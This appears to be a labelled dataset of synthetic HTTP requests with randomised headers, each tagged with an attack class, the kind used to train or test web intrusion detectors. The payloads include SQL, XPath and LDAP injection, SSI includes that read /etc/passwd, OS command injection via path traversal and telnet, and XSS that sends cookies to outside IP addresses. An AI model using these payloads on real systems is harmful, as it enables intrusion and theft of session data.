UA-Disp: 8243,837,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 349x5070
Via: 9.0 239.185.121.92:97478
Transfer-Encoding: identity
Upgrade: stT/5.6, dNCu1u/2.7, di5ti/6.5, eDm4t/8.4
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 131.123.223.117
X-Serial-Number: 83787585359566262
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43899
Start - Id: 38685
class: LdapInjection
GET /rE0SeVQKppPwDQ/urap9btH5C1TteA/nanQe5bet/w3PlhavinghS/tHuVJ9ggPWvC9gw/h90heee6ra/eNc5rURNYAa82_0w1H/q3qFtNU1P3Bk0yP/bw7XUmA-AmjFolV/ed1/a_x@fLzm4@NzrI.css?57zCX.h8X03U=%29%28+++%7C+++%288teee%3Dpcot*%29 HTTP/1.0
Host: 74.75.5.108:06
Connection: ASOotitc
Accept: video/*
Accept-Charset: windows-1252;q=0.7, x-mac-icelandic;q=0.7, windows-1252;q=0.5, utf-8
Accept-Encoding: 
Accept-Language: 98cte-kie;q=0.3
Cache-Control: 64='ade'
Client-ip: 19.47.61.99
Cookie: biehc=671;5KGtHQ=t6mua;nap=innta
Cookie2: $Version="32"
Date: Mon, 27 Oct 08 17:43:05 GMT
ETag: "EvxKQQHQRlpZyyner"
Expect: Nh7w=4aegcen;feoka
From: nTromT8u@pzcel.it
If-Modified-Since: Mon, 31 Dec 07 01:24:17 UTC
If-Unmodified-Since: Sat, 27 Nov 04 18:24:19 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7489
MIME-Version: 5.2
Pragma: nomesgt='nsbha5oe'
Proxy-Authorization: NTLM NW9uckk4bWZtaXRyMGFvemFoaXJZZWNoZW5jaWV5Zmxpc2EzYXNOZWVzNXM=
Authorization: 6ihhe espLlr=pe0sloao
Range: 798895-
Referer: /t2dsi/sZbiEo/idTih.exe
TE: trailers
Trailer: Warning
User-Agent: teaitsu (uvOPDU; lrQpknW4; ooPJBn9; ao3H-e5cZ)
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6318x7597
Via: xp7ts/8.6 www.rBeme1h.html, 0.0 46.178.138.131
Transfer-Encoding: identity
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 827 128.241.155.90 "rdxPrqmix" "Mon, 08 Aug 05 16:44:17 GMT"
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38685
Start - Id: 39697
class: SSI
GET /hSo0hHvaJB5Y/aHI2a/oTmu/Sfvafni/ti0gbgYYcX_U@/fua2NPR3YcGjB.Wo/4nhmOenuSib/v.s97pWv2/u8cZKMbkqE_S/NCiT8aoehianbti8nln/XnetcatB.swf?An=%3C%21--+++++%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++--%3E&ehtsommdrwrli=ai7stdin%2BzsNtId6gli HTTP/1.1
Host: www.ncest.st
Connection: 1e6y
Accept: */*;q=0.9
Accept-Charset: iso-2022-kr, iso-8859-3, iso-2022-kr;q=0.1, windows-1257;q=0.5, iso-8859-2
Accept-Encoding: compress, gzip
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 120.48.93.141
Cookie: uv=skOmMml;kUeQ6iv=39897682;ac7DQX_W=uOie?N
Cookie2: $Version="14"
Date: Thu, 21 Jan 10 01:59:25 GMT
ETag: W/"xkPYfz.4VPY.xSX"
Expect: oarcc=Trewn;ut0pnrz
From: ekb7rls@onnByehnb.gov
If-Modified-Since: Wed, 11 Feb 09 18:30:43 UTC
If-Unmodified-Since: Fri, 30 Nov 07 02:59:55 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 13 Apr 08 02:38:32 UTC
Max-Forwards: 770
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic aDJlRTplb2V2b2ll
Authorization: Basic cm5mYWVPYW86bmdlbA==
Range: 11490-87515,-392,063833-721563
Referer: http://ttnq0o.fr/isvu/eHtw/btis6hi.wmn
TE: gzip;q=0.7,deflate;q=0.3
Trailer: If-Match
User-Agent: aaaeieettnlhei
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 726x074
Via: 3.7 112.42.80.76:6
Transfer-Encoding: compress
Upgrade: im0/0.0, gln/3.7
Warning: 245 www.etcYe.gif "ra5teOtlcka8shsedl7" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39697
Start - Id: 35156
class: SqlInjection
POST /KSezXIu5URfrom.cgi? HTTP/1.0
Content-Length: 258
Content-Language: imaamt2h,egNduke
Content-Encoding: deflate
Content-Location: http://www.a3l8.de/tztu/Ue8tieij.cfm
Content-MD5: RGFvb2JGaWdsYnB5dWVEYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Jan 04 24:22:54 GMT
Last-Modified: Sun, 12 Jun 05 23:53:54 CET
Host: 169.219.165.127
Connection: keep-alive
Accept: text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2465
Client-ip: 230.250.218.171
Cookie: BUN8wJ=jform(gT?t;zmhloralelEele=iframemcatWSusua;eeue2iR1una=o1X8fQOJ7g;hoaekc4=shutdown2$eqtKl/ xr;st;bersqournicdtw=59961292
Cookie2: $Version="7"
Date: Wed, 29 Sep 04 08:02:17 CET
ETag: W/"9oyFG7G2vADDI9Y"
Expect: eel5Noee
From: obasole@fadfesnt.cz
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Sun, 07 Dec 08 11:48:49 UTC
If-Match: *
If-None-Match: "R8d@tNBf6SyOsDkYFz"
If-Range: *
Max-Forwards: 1038
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: NTLM cG5vZWhldjNpclR3aWZndWUzc2Vsb3RzZXFqZWZEODBlbmJqcm90d2VhbQ==
Range: 19-,8448-508426,664-75850
Referer: http://veDlT5.cz/gieilRe/THeih9Im/adnev/mseislct.php3
TE: deflate
Trailer: Host
User-Agent: trg54uhetlRahaptiN8l
UA-CPU: StrongARM
UA-Disp: 2481,6599,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: hr1/3.1 www.o4s3em5e.jpeg:93456, 1.3 www.zmUtAft.html, 7.2 www.iLb7rPNa.jpeg:15025
Transfer-Encoding: deflate
Upgrade: ispEo/3.6, Yt33t/0.8, dlleet/6.1
Warning: 616 www.siai.png "ttlplonce" 
X-Forwarded-For: 126.226.47.150
X-Serial-Number: 1589979747
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sNser6ht=emKw&otuedae0leeeA=';   insert into  szon    values(666,'ekrce','noodsnho',0xfffff)&-V8k0Ga3A=dnrs&wa8aorwm=oUcEg?o&kMeUAc@t=uP&peeont0fadha=73975456&uneSoxuuHielfw=aetaDwNjb7eryAn8&ddeehe=(a5fo1Tkera8nn&d3ong=dIhcna&ld=fax

End - Id: 35156
Start - Id: 35630
class: XPathInjection
GET /tEsPL3JQWo4KfL_oLM_d/qc/tzgaNeojoyo9nFd5n1h/ehp7/aIOmPpcMUeEpnPT29ad/jqG/HtarD/D2Xh/lllii.nsf?soeiClfnuor=hsLsaNDEpZo&schsrTenre5st2l=abati0iD%27+or+++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28+++i+%2Bj%2Bk+%2B++++l+%2B++++1%29%5D+%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++++%27tttasua%27+%3D+%27+++djbo%27+++++or&teet9N0iA=xJmkO4J81&r1hGni=306042910&zky=ey%3Eat&q40unmoisn=7171124&a9oad=ppcosnL&02hEhI8e=39999242&otd=aot&ic8d8=cL-&ein=DrerpteLb8AVaea HTTP/1.1
Host: 148.160.205.95
Connection: close
Accept: */*
Accept-Charset: gb2312;q=0.5, windows-1250;q=0.5, iso-8859-7
Accept-Encoding: compress;q=0.4, compress, gzip, compress;q=0.3, identity;q=0.1
Accept-Language: h0a-uiee, T-4an;q=0.9, tnrvae-ort5seo;q=0.9, mla-dsh;q=0.0, hcitee2-f2;q=0.0
Cache-Control: only-if-cached
Client-ip: 108.171.74.43
Cookie: B9eiFyutj=oe/d+j2eey1trI 
Cookie2: $Version="6"
Date: Fri, 18 Feb 05 03:25:07 GMT
ETag: W/"MtaA7VKLaZIKhkEV"
Expect: 100-continue
From: rzin8cri@efHTe5.be
If-Modified-Since: Sun, 02 Jul 06 22:53:33 CET
If-Unmodified-Since: Mon, 23 Oct 06 12:40:57 CET
If-Match: *
If-None-Match: "2.2BaS11gS5ABZW"
If-Range: "z285ETIARPyp0Sb0Hn.t"
Max-Forwards: 40
MIME-Version: 3.8
Pragma: dtsnAAl='nEdTn'
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: 0Sri sdeo=1cleT9
Range: -08131,67246-2877
Referer: /lTrryj/7s2dtc/tapsi/raao/Eeaizg.ace
TE: trailers
Trailer: Range
User-Agent: Mozilla/5.9 (Windows; U; Windows NT 2.2; xj-d2; rv:4.0.3) Gecko/45351176
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 817x128
Via: 7.6 www.oxfmgklo.tiff
Transfer-Encoding: deflate
Upgrade: eclhdI/8.8, x4oas2/8.6, oieb/7.4
Warning: 986 www.rBnsrcl.html "5cdarlosaE" 
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 65275952070459353
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35630
Start - Id: 44434
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.0
Host: www.ieCs0adeN.cz
Connection: close
Accept: text/*;q=0.9, image/gif;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 27.105.36.250
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="74"
Date: Sat, 18 Oct 08 07:08:01 UTC
ETag: "2tnZ37xD4wGUw-x"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Fri, 18 Jan 08 21:31:35 GMT
If-Unmodified-Since: Sat, 13 Oct 07 16:08:45 UTC
If-Match: *
If-None-Match: "zyrhq9-I2ZwYaJGgyNd"
If-Range: *
Max-Forwards: 0
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic aWVzODp5ZWh5aQ==
Authorization: NTLM b2VvbG5zT2dlZlJBaDBRQ3RnZW9BcmZmbnlsaDZoOXRlaDRyd3Nod3NwMWk=
Range: 6-02287,72753-
Referer: /4waol1l/Fsrrth/nkt8.pdf
TE: deflate;q=0.1,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.5 (Machintosh; U; PPC Mac OS X 9.5; ta-eo; rv:2.3.1) Gecko/26073346
UA-CPU: Sparc
UA-Disp: 712,4716,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 053x237
Via: FTP/3.9 88.149.17.219, FTP/8.8 www.7wamwAnn.png, 0.3 www.1s8n.htm
Transfer-Encoding: gzip
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 041 www.nmtu.css:96410 "tmhhadncfjtereqA" "Mon, 28 Sep 09 17:32:04 UTC"
X-Forwarded-For: 1.199.151.97
X-Serial-Number: 42253
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 44434
Start - Id: 43490
class: OsCommanding
GET /dEoXT8i_2HhR/Cdetoylasi10eseett/-IThavinghK.0/tUwOq/lorgefs/fBA.TadZLm8qvQA7.php?zU=%5C%22++%5C%3B+++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+www.ererngieen.com+++638%5C%3B&.dvN11KIDK9=j%3Aa+frdHoe&rcen4a8auetas5b=4dr&XowBA0=a%7Cu-c%5Crasystem HTTP/1.1
Host: www.7topRlsto.st
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9;q=0.8, windows-1251, utf-7;q=0.7, x-mac-arabic;q=0.5, x-mac-icelandic;q=0.7
Accept-Encoding: *
Accept-Language: arihtfsl-hq, excRnIa-5nsode, hds-arwl;q=0.1, ssdgdd9l-cdi;q=0.8, aevh-eav;q=0.4
Cache-Control: xe=lrRrrTrw
Client-ip: 247.196.108.175
Cookie: srfeaolkg=a02gMX;slH5ud=ncvr8ehiryes;mh9c3Ue=8
Cookie2: $Version="39"
Date: Tue, 26 Aug 08 06:05:06 CET
ETag: W/"lGLw3QTcNpilMnmU"
Expect: 100-continue
From: oie3rs@dut5nl3e.uk
If-Modified-Since: Thu, 08 Jan 04 08:24:29 GMT
If-Unmodified-Since: Sat, 11 Dec 04 08:15:53 GMT
If-Match: *
If-None-Match: *
If-Range: "7yCZLPgOBjNDzS-j"
Max-Forwards: 6
MIME-Version: 0.6
Pragma: sttaot=aia
Proxy-Authorization: NTLM b2NpT2hvcW1vN2ljcXB0Z25oZXNzbUVvN2Vpc2FFcmRBc2RuaFQ=
Authorization: NTLM c3hyaU5lc3JmeWV0dmVheW1oZXRudGhlOGNSaEVQYWd0YjdsaGdpdHNlZXMzcnFv
Range: 4-
Referer: /opt1i/2bno7/fmnrgele/obqrnvio/oiedeae.pl
TE: chunked;q=0.7,trailers,trailers
Trailer: Connection
User-Agent: y.RLYJD http://www.wthhd.biz
UA-CPU: Sparc
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2941x889
Via: HTTP/8.9 www.e6o2u4l.gif:4343
Transfer-Encoding: deflate
Upgrade: rhao/3.7, yin4/4.0
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43490
Start - Id: 39701
class: SSI
GET /cheHcsly/A9G7ZPfeEP-/gyyP/sn6nrnt9/Ieryib/biueexy5ugse/qAaW3z0NYxJina/s39brfAusttopfhiwa/rGdWAj06K4pbrB/g9ToA.nsf?htmpS85yOx=%3C%21--++++%23include+virtual%3D%22%2Fetc%2Fpasswd%22++--%3E HTTP/1.0
Host: www.ialroeens.com
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: f-Oqbeta;q=0.3
Cache-Control: hTts=ehs3att
Client-ip: 120.48.93.141
Cookie: no=654908815;jGaicCem=636;nwecHuSnseavai=aL5XhG0jT7i-;2hep3tN=71715132;uwg0vEDssrded=763437;bJnmgc9= id
Cookie2: $Version="4"
Date: Sat, 06 Mar 04 15:55:54 UTC
ETag: W/"jt1AC_ivsOO4-H-g4o"
Expect: 100-continue
From: dOrrrspe@5lmtas.st
If-Modified-Since: Sun, 04 May 08 01:39:28 UTC
If-Unmodified-Since: Tue, 27 Jan 04 19:43:28 UTC
If-Match: "0HXU9vo7gOStV6lt"
If-None-Match: "sYVsR1Vg2hW.vmfi445"
If-Range: Sun, 20 Aug 06 02:45:23 UTC
Max-Forwards: 077
MIME-Version: 9.9
Pragma: dlhtr='fse'
Proxy-Authorization: mE1df gdtrmo=oh1esyls
Authorization: Basic cm5mYWVPYW86bmdlbA==
Range: 557783-681,980106-
Referer: /oukhg6/yoedn6sf/utrt/ncrn/jmaqjEl.wav
TE: trailers,gzip
Trailer: If-Match
User-Agent: Mozilla/0.2 (compatible; Konqueror/4.2; Solaris; eembt; nirtho)
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 726x074
Via: HTTP/5.2 112.213.126.132:122, Aecwe/5.7 5.217.236.76, 9.2 www.MEaiimT.jpg
Transfer-Encoding: compress
Upgrade: im0/0.0, gln/3.7
Warning: 081 www.8wna8.jpg:64 "othhe5UTHRpeH" "Tue, 13 Jun 06 09:06:37 CET"
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39701
Start - Id: 42013
class: SqlInjection
GET /hoathufemw/iGrhteaslo.shtml?eispeazfD116o=byc&th=hpop0mf1&tlh=Pneno3&1heg7ouolnioro=%3B+++EXEC%28++++%27INS%27%2B%27ERT+++++INTO++++users+values%2871%2C%27idby0t4h0v%27%2C%27wrTjeec%27+++%29%29 HTTP/1.1
Host: www.ge7audo.be:325
Connection: close
Accept: application/*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: acef-de;q=0.1, trsnleh-tshe7, frlo-i3hagh;q=0.9
Cache-Control: min-fresh=006
Client-ip: 209.185.53.108
Cookie: AHB3Ld04y=yoo;ehdltuhek=eYa6
Cookie2: $Version="334"
Date: Mon, 09 Jan 06 20:15:34 UTC
ETag: "6Uyl2Y07moKN10dFmON"
Expect: 100-continue
From: etDdz@s1Ttlneied.ch
If-Modified-Since: Wed, 04 Oct 06 22:40:15 UTC
If-Unmodified-Since: Sat, 18 Oct 08 11:49:49 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 31 Jul 09 22:02:34 GMT
Max-Forwards: 0
MIME-Version: 2.8
Pragma: oizlT=rdiasam3
Proxy-Authorization: Digest uri=/oyooyi/aelsuo1/iteo/eu7usa/EDiri.cfm
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: /ndo7a/emcghb/sneenn/naWcwwah/latde.msf
TE: trailers,chunked
Trailer: Trailer
User-Agent: eettrw (dh_x2m7bka; nw0V@8wk; mu._p-n5r7; 1w@jr5T; qvup0n)
UA-CPU: Sparc
UA-Disp: 442,012,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0057x268
Via: HTTP/0.6 www.ntieoete.jpeg:482, HTTP/4.0 www.2zioEwoo.jpeg
Transfer-Encoding: compress
Upgrade: oNeesa/5.1, old/9.8, 9snek/4.6, 2and/4.1, erjmEs/4.6
Warning: 117 www.dpoc.html "usfeuteterl01" 
X-Forwarded-For: 58.152.231.239
X-Serial-Number: 063116688396663
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 42013
Start - Id: 39328
class: SSI
GET /elo7eoc8nohuIin/h2szLFxvGIIGG@7/snA.js?yat=%3C%21--%23email+fromhost%3D%22www.jcaa6l.com%22+tohost%3D%22mailbox.leiSo.com%22+message%3D%22ceis+4es9t7+absi+sne2%22+fromaddress%3D%22ebtdot.com%22+toaddress%3D%22gzi.nf.com%22+subject%3D%22bno%22+sender%3D%22tgN.com%22+replyto%3D%22ue0hC.com%22+cc%3D%22thqh%22+inreplyto%3D%22inrl+lpau+0C%22+id%3D%22sOmail%22+--%3E&AT=7&950D@CjuD=1645049 HTTP/1.0
Host: 156.58.115.249:7980
Connection: keep-alive
Accept: application/x-tar;q=0.4, application/x-tar;q=0.1
Accept-Charset: big5;q=0.7, iso-8859-1;q=0.1, iso-8859-15;q=0.2, x-mac-turkish, us-ascii
Accept-Encoding: deflate;q=0.3, compress;q=0.3, deflate;q=0.9
Accept-Language: fionWeu-sh, a-tieuxac;q=0.4, 7a-s, eoutned-mlifowro, iNLem-liail
Cache-Control: no-transform
Client-ip: 108.73.42.141
Cookie: odgoo=D1tfi;eeEn5xg2eSa=184788;ehr18=5869314189;rle= &Saoheh
Cookie2: $Version="44"
Date: Thu, 13 May 04 12:34:24 CET
ETag: "ahn213INlIBdLEkYKdGT"
Expect: 100-continue
From: fiaotu@eNeFi.it
If-Modified-Since: Sat, 06 Nov 04 01:33:26 UTC
If-Unmodified-Since: Sat, 07 Apr 07 02:56:29 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 19 Mar 10 23:09:39 CET
Max-Forwards: 27
MIME-Version: 5.7
Pragma: xa=eti7n8
Proxy-Authorization: Digest opaque="nbcimQad"
Authorization: NTLM c2RBb3NidXRhNmFlVHJ3c2Vlc1V4aG1kZGV4cm9Fb2Vxcg==
Range: -7892
Referer: /rtlummke/njen4/buya/8nop7/kFtipmK.conf
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/4.8 (Windows; U; Windows NT 2.7; 0d-la; rv:1.2.5) Gecko/49346790
UA-CPU: x86
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9132x248
Via: HTTP/6.0 123.127.180.111
Transfer-Encoding: enlrrt
Upgrade: hsyn/7.1
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 135.206.207.129
X-Serial-Number: 802337450581
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39328
Start - Id: 41353
class: SqlInjection
GET /cfeuakMQZpwfo.XNl/0k9o.msf?hcoht3ileoeqn=3nl6&d4ts8na3eH=467597160&rebh=tedtclqLeeet0iTf&v5lmArGode=Swsta%26oodmioew&oNmd=4060186&CdcedwalI=eh&dheJetnshe=01898&Tdsdactyitd=16656&ryiTf1ylttaodj=nsa&eoasehn=6993 HTTP/1.1
Host: www.u8lT5uttE.org
Connection: 7yaEeshe
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: ki-iadeg;q=0.0, rsn-apr
Cache-Control: r='imt'
Client-ip: 89.39.246.138
Cookie: sBofzs8=uAnab'    ); DEL/**/ETE  FROM  users WHERE  upper(username)     =  upper( 'admin;eaceinhelre=etEa;wmenovrows=580528;iszht=63483185;AnOTtriwotedOCF=n07Y;5umg3=NthoI92
Date: Sun, 01 Aug 04 06:50:24 CET
If-Unmodified-Since: Fri, 25 Nov 05 12:10:27 UTC
If-Match: *
If-None-Match: "jKVOwqxuvf0lzsv9Y"
If-Range: *
Max-Forwards: 1
Proxy-Authorization: NTLM dHVtNEFpUnRubXVFeWtFaWV1bm9yb2lvdHdINDBjT25ldGl0RWVldHplZWU0cA==
Authorization: isesr5 eiluilAw=8nqdog
Referer: /ihs8tr/gUuta.jpg
Trailer: Accept-Charset
User-Agent: hltxtcelfeduyx8t
Transfer-Encoding: gzip

null

End - Id: 41353
Start - Id: 35133
class: SqlInjection
POST /B0zcfN.jsp? HTTP/1.0
Content-Length: 268
Content-Language: p,Aaobwr5,trsona
Content-Encoding: deflate
Content-Location: http://www.eo1rad.cz/di7b4eg/cdcnzvew/0rayyo.mp3
Content-MD5: YnJncnlwbmd4ZWxvcnVkZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Aug 08 22:27:38 CET
Last-Modified: Sat, 06 Sep 08 09:43:18 GMT
Host: 220.122.145.181
Connection: dend
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: e2nl3-bk, lIttzeni-ah4, aHrwhb6-enyz, li-ne, pNntteOY-hxgEzi;q=0.0
Cache-Control: e6oss='e'
Client-ip: 119.220.168.61
Cookie: 4nab6ezjei=rfa
Cookie2: $Version="43"
Date: Sun, 12 Mar 06 03:45:03 GMT
ETag: "wECWPXUQhi-PB9N"
Expect: ia7oljae
From: M1ef@dtSta5dnW.gov
If-Modified-Since: Tue, 02 Oct 07 23:47:18 GMT
If-Unmodified-Since: Mon, 28 Jan 08 20:40:25 CET
If-Match: "TRPBEfuXE5aCke9d"
If-None-Match: *
If-Range: Sun, 02 Aug 09 23:58:45 UTC
Max-Forwards: 32
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: 03hTlE Tqem=cllmecx
Authorization: NTLM RWVndG50NnppWWNzYW16aGNvYWhuc25vdDlZb2Fyb3lhMnlzeHlyaA==
Range: 9644-,893-04607,798896-
Referer: http://uTgn.it/bno94a/swnnieh.jsp
TE: trailers,chunked;q=0.4
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 7.7; in-mt; rv:6.1.5) Gecko/85939012
UA-Disp: 124,974,8
UA-OS: Windows NT
UA-Color: color8
Via: 4.3 158.99.178.146, 4.3 57.150.156.12, AIm/5.9 www.arei.shtml
Transfer-Encoding: ratUn; isTmXtg=raertl
Upgrade: masee/8.5, drdmb/5.6, asJ/9.9, oume2Y/4.6, pmsuya/8.2
X-Forwarded-For: 126.226.47.150
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BKn2k@w=eupdatemlocation-eha7is&v1group byn=8483&wUAEo-GOd=waaehsgsdutm&riem=304&WbgTThx0ePc=A6eFtaaoeZjtshe7&8o=36822&all2mgb6_-X0=ixUTCz&lvbscriptx6orKeetvqC=OR    'DEeetnE'    =    'Sim'+'ple'&Io2eceATuchmt7=67894&dam4oet=4487243&mtrty6lfeoslbo=4016

End - Id: 35133
Start - Id: 47014
class: XSS
GET /9jVdIEcCgZubDNVh8Y/idTMSjxO9_frF/8lKceynsmbsew/rs4aeecszeWole7mo1t/a9N5FDwp-zLPUxsDgc/CLN9GA-5/t8vioshzh2Lb9n/i47EnetuhT1vthst2/sieYDzaWrN/MX/hH8xwOcb8YiYT.css?nh1te=%3C%21%5BCDATA%5B%3C%21--%5D%5D++++%3E%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F11.93.132.30%2Fes.cfm%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript%3E HTTP/1.1
Host: www.UnnaCosla.net:80
Connection: xSwcsehs
Accept: application/rtf;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.0, deflate, compress;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 18.81.58.217
Cookie: qds0w=iuweavlarhfb
Cookie2: $Version="07"
Date: Wed, 13 Jan 10 10:31:16 GMT
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 3tsw=ktosi6aa
From: Desiah@eghc.be
If-Modified-Since: Fri, 09 Apr 10 12:49:02 GMT
If-Unmodified-Since: Tue, 10 Jul 07 07:07:46 CET
If-Match: *
If-None-Match: "8PpG3FqQ9ZuEzoYwB_"
If-Range: "tAsGUpn2Oqq7UuroOq"
Max-Forwards: 21
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWV0YmV0Mm9iQW9DOGd5TmV4U3R4bXRZNnNhbGRlaG9Wdmk=
Authorization: Digest username="unbxdine"
Range: 5-22964
Referer: http://jris.biz/si8dnDn/zssn/rqe2s.htm
TE: trailers
Trailer: Host
User-Agent: wpT.Z4f http://www.heaslfgN.it
UA-CPU: Sparc
UA-Disp: 128,634,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: FTP/1.0 www.deximPfs.shtml
Transfer-Encoding: aoav
Upgrade: me2u/0.5, c1ltE/4.5, nttiep/4.6, nsse/9.4, npleer/2.6
Warning: 523 www.sioteo.shtml:61 "e4ipraamice7" 
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 239527167
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47014
Start - Id: 48069
class: XSS
GET /0amVstyle_W/na/erx2/D3bY0ZmXlinkinIyC.mdb?e9olmuioat5b=mrAeA1yBnnqv2N&kbs5pelln=%3Ciframe+++src++%3D++%22+++vbscript%3A%5Bwindow.open%28%27http%3A%2F%2F22.248.207.1%2Fat.asmx%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E HTTP/1.0
Host: www.en5t.cz:51828
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp, windows-1252, x-mac-japanese, isiri-3342
Accept-Encoding: deflate;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 185.80.82.48
Cookie: ji5canbs=68987;jnes=os;n44sIet=yRZ
Cookie2: $Version="5"
Date: Mon, 24 Mar 08 16:59:02 CET
ETag: "R5BYw6j-JCKxG5F_i"
Expect: fuezA
From: dhasadu@Aharrt.org
If-Modified-Since: Sat, 22 Mar 08 05:12:10 CET
If-Unmodified-Since: Mon, 01 Nov 04 20:19:13 GMT
If-Match: *
If-None-Match: "uq73dQZJVl33VABgs"
If-Range: Fri, 11 May 07 13:37:16 CET
Max-Forwards: 01
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=Hoedi
Range: -1,041-88,-53
Referer: http://www.iagzts.ch/0nsek/saR2/srrrsaHW/orvtt.jpeg
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.8 (Windows; U; WinNT 6.3; hy-zc; rv:5.5.6) Gecko/62273787
UA-CPU: x86
UA-Disp: 4437,742,16
UA-OS: Solaris
UA-Pixels: 6001x2247
Via: 0.4 www.i3wnlsdR.png
Transfer-Encoding: nptae
Upgrade: 0eadh/9.5, oyzasn/0.3, ulmsi7/4.4, bdhaod/9.0, riJn/7.4
Warning: 634 www.yauedif.css:99300 "eQn3Xdra5ghbItoas" 
X-Forwarded-For: 69.186.228.89
~~~~~: ~~~~~~~~~~

null

End - Id: 48069
Start - Id: 47579
class: XSS
